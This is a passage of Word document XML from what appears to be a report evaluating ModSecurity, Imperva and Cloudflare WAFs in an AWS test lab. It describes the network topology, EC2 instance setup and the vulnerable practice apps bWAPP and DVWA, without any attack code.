          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wa</w:t>
      </w:r>
      <w:r w:rsidR="001E719A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s configured with ModSecurity WAF and host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="001E719A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the site modsectest.cf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE4E8F4" w14:textId="74F5AA14" w:rsidR="00C9459B" w:rsidRDefault="00C9459B" w:rsidP="009B2B66">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="212783AE" wp14:editId="496F9ADD">
            <wp:extent cx="5067300" cy="131206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380" b="10614"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5198051" cy="1345923"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8AB615" w14:textId="7F390FF5" w:rsidR="009B2B66" w:rsidRDefault="009B2B66" w:rsidP="009B2B66">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc71138525"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Network topology with ModSecurity WAF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="2C035CF6" w14:textId="6196B626" w:rsidR="00990E52" w:rsidRPr="00990E52" w:rsidRDefault="00990E52" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00CA1C2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows the third server’s network topology, the client connects to the internet then</w:t>
      </w:r>
      <w:r w:rsidRPr="00990E52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Imperva’s or Cloudflare’s cloud WAF before connecting to web server tha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>t was not configured with any on premise WAF and hosted the site imptest.cf or clfltest.cf respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439D4684" w14:textId="2D52DEC2" w:rsidR="005550C8" w:rsidRDefault="005550C8" w:rsidP="00804829">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792E2DAD" wp14:editId="21269DA7">
            <wp:extent cx="5731510" cy="12223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22375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F38855A" w14:textId="70B1A096" w:rsidR="00804829" w:rsidRDefault="00804829" w:rsidP="00804829">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc71138526"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Network topology with could WAF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="452CDC48" w14:textId="61E5F1B4" w:rsidR="00817B95" w:rsidRDefault="00F151C0" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The four servers sit in the same virtual private cloud (VPC) on Amazon</w:t>
      </w:r>
      <w:r w:rsidR="00A33FB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as seen in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00CA1C2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B04C46">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A fifth server also sits in the same VPC. The fifth server </w:t>
      </w:r>
      <w:r w:rsidR="00D0754E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>wa</w:t>
      </w:r>
      <w:r w:rsidR="00B04C46">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s used to perform a reverse shell attack.</w:t>
      </w:r>
      <w:r w:rsidR="00CA4388">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The servers were </w:t>
      </w:r>
      <w:r w:rsidR="00E93377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>allowed</w:t>
      </w:r>
      <w:r w:rsidR="00CA4388">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to communicate with one another with their respective internal IP addresses.</w:t>
      </w:r>
      <w:r w:rsidR="0051563E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> External connections were only allowed to communicate with the </w:t>
      </w:r>
      <w:r w:rsidR="0051563E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>servers</w:t>
      </w:r>
      <w:r w:rsidR="00F61D19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the internet</w:t>
      </w:r>
      <w:r w:rsidR="0051563E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by their respective external IP addresses or DNS via ports 22, 80, 443 or 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0677E8A2" w14:textId="2DE6D512" w:rsidR="00817B95" w:rsidRDefault="00DF5BF1" w:rsidP="00804829">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6257EBC0" wp14:editId="0FE1944B">
            <wp:extent cx="5731510" cy="24974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97455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88E690" w14:textId="2B098F64" w:rsidR="00804829" w:rsidRDefault="00804829" w:rsidP="00804829">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc71138527"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - VPC within AWS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="053589DF" w14:textId="7D1EF312" w:rsidR="00F81A8F" w:rsidRPr="00A33FB2" w:rsidRDefault="00DA7190" w:rsidP="00DA7190">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc71138490"/>
      <w:r>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00F81A8F" w:rsidRPr="00A33FB2">
        <w:t>Infrastructure on AWS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="01E53E05" w14:textId="7C4D60AE" w:rsidR="00F81A8F" w:rsidRDefault="00D970A1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In this subsection, we will take a look at how the environment was set up on AWS. </w:t>
      </w:r>
      <w:r w:rsidR="001713AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Two</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of AWS services were used; EC2</w:t>
      </w:r>
      <w:r w:rsidR="00F72323">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>and Route 53.</w:t>
      </w:r>
      <w:r w:rsidR="00D768F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The infrastructure setup consisted of setting up the network and servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5AEF9B" w14:textId="7790008A" w:rsidR="00E005A1" w:rsidRDefault="00E005A1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">As EC2 instances are typically the servers on AWS, the number of EC2 instances created was five. </w:t>
      </w:r>
      <w:r w:rsidR="00AB31FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">All the instances are identical. The first instance was launched and </w:t>
      </w:r>
      <w:r w:rsidR="00FC53AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">fully </w:t>
      </w:r>
      <w:r w:rsidR="00AB31FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>configured. An Amazon Machine Image (AMI) of the instance was then created. Using the created AMI, four more instances were launched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D531C83" w14:textId="62E409E5" w:rsidR="00D970A1" w:rsidRDefault="00AB31FA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Each of the instances </w:t>
      </w:r>
      <w:r w:rsidR="003B1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>were launched with Amazon Linux 2 AMI, 64-bit (x86) with a t2.micro instance type and 8GB SSD storage in the same VPC.</w:t>
      </w:r>
      <w:r w:rsidR="00F959CF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> They were all assigned to the same security group. The security group was configured to allow outbound traffic and restricted inbound traffic to traffic from all IPs via TCP ports 22, 80, 443 and 8080. The security group also allows ICMP connections from all IPs.</w:t>
      </w:r>
      <w:r w:rsidR="00163343">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH configuration was also set up with it being configured to only </w:t>
      </w:r>
      <w:r w:rsidR="00E80E68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">allow </w:t>
      </w:r>
      <w:r w:rsidR="00163343">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="00E80E68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="00163343">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the use of a specific private key that was generated </w:t>
      </w:r>
      <w:r w:rsidR="00163343">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>at the time of the instance’s launch.</w:t>
      </w:r>
      <w:r w:rsidR="00AA0A53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> All of the instances were situated in the west of United States, Oregon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615C92B8" w14:textId="7FB221A2" w:rsidR="00FC53AB" w:rsidRDefault="00617124" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The first instance was then configured with the necessary</w:t>
      </w:r>
      <w:r w:rsidR="00C822D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> services,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00130E61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications. Firstly, it was important to set up the web service and database.</w:t>
      </w:r>
      <w:r w:rsidR="004A4C3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache</w:t>
      </w:r>
      <w:r w:rsidR="003A121A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> MariaDB</w:t>
      </w:r>
      <w:r w:rsidR="003A121A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and PHP 7</w:t>
      </w:r>
      <w:r w:rsidR="002530CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">were installed through using yum install. </w:t>
      </w:r>
      <w:r w:rsidR="00AD649A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Upon completion of installation of the services, they were configured to start automatically every time the server booted up.</w:t>
      </w:r>
      <w:r w:rsidR="00130E61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The web applications, phpMyAdmin, bWAPP and DVWA were next to be installed. </w:t>
      </w:r>
      <w:r w:rsidR="00822E89">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The applications were downloaded and situated in /var/www/html/ directory, the root folder of the web service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73985672" w14:textId="30F8B9E2" w:rsidR="00AC07E2" w:rsidRDefault="00AC07E2" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>With the settings thus far done, the five EC2 instances were already able to communicate with one another.</w:t>
      </w:r>
      <w:r w:rsidR="00FE0804">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every time the instance was launched, it would be given a new public IP and DNS address, which was not feasible to link it to a domain name. As such, each instance was configured with a static public IP and DNS address. In AWS, this was done by setting up elastic IPs and allocating them to each instance.</w:t>
      </w:r>
      <w:r w:rsidR="005E0469">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The settings used for each elastic IP was set to us-west-2 for the Network Border Group and assigned Amazon’s pool of IPv4 addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FFE632" w14:textId="2A6A563F" w:rsidR="001131EE" w:rsidRDefault="005A313C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that the instances had a static public allocated each, </w:t>
      </w:r>
      <w:r w:rsidR="00324397">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>domain names could be pointed to them.</w:t>
      </w:r>
      <w:r w:rsidR="00754BED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In AWS, domain names are managed under Amazon’s Route 53. As the four domains (mentioned in the previous subsection) were not registered through Amazon but through an external party, the domain names were configured directly by creating a public hosted zone.</w:t>
      </w:r>
      <w:r w:rsidR="00BE6724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The DNS records were </w:t>
      </w:r>
      <w:r w:rsidR="00EB0740">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidR="00BE6724">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>updated as required to point the traffic to AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDAD2A3" w14:textId="299CEA02" w:rsidR="00FC53AB" w:rsidRPr="00DE6606" w:rsidRDefault="00754BED" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">After completing all the setup on AWS, the </w:t>
      </w:r>
      <w:r w:rsidR="00673945">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">installed web applications on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>instances were then accessible through the respective domain names.</w:t>
      </w:r>
      <w:r w:rsidR="00D354AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The next step would be to onboard the WAFs and configure them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6D6F9" w14:textId="66A03049" w:rsidR="00F81A8F" w:rsidRPr="006E2156" w:rsidRDefault="00DA7190" w:rsidP="00DA7190">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc71138491"/>
      <w:r>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00F81A8F" w:rsidRPr="006E2156">
        <w:t>Onboarding of WAFs &amp; WAF Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="3DA39E54" w14:textId="0FDCDF06" w:rsidR="00F81A8F" w:rsidRDefault="001C13BB" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In this subsection, we will take a look at the installation of ModSecurity’s WAF on one instance, onboarding of imptest.cf and clfltest.cf on Imperva’s and Cloudflare’s cloud WAF respectively.</w:t>
      </w:r>
      <w:r w:rsidR="00715106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will then take a look at the default configuration of each WAF and make the necessary </w:t>
      </w:r>
      <w:r w:rsidR="00715106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>minimal configuration changes to prepare for the test plans that would be elaborated in the next subsection, Test Plan</w:t>
      </w:r>
      <w:r w:rsidR="005C190F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00715106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
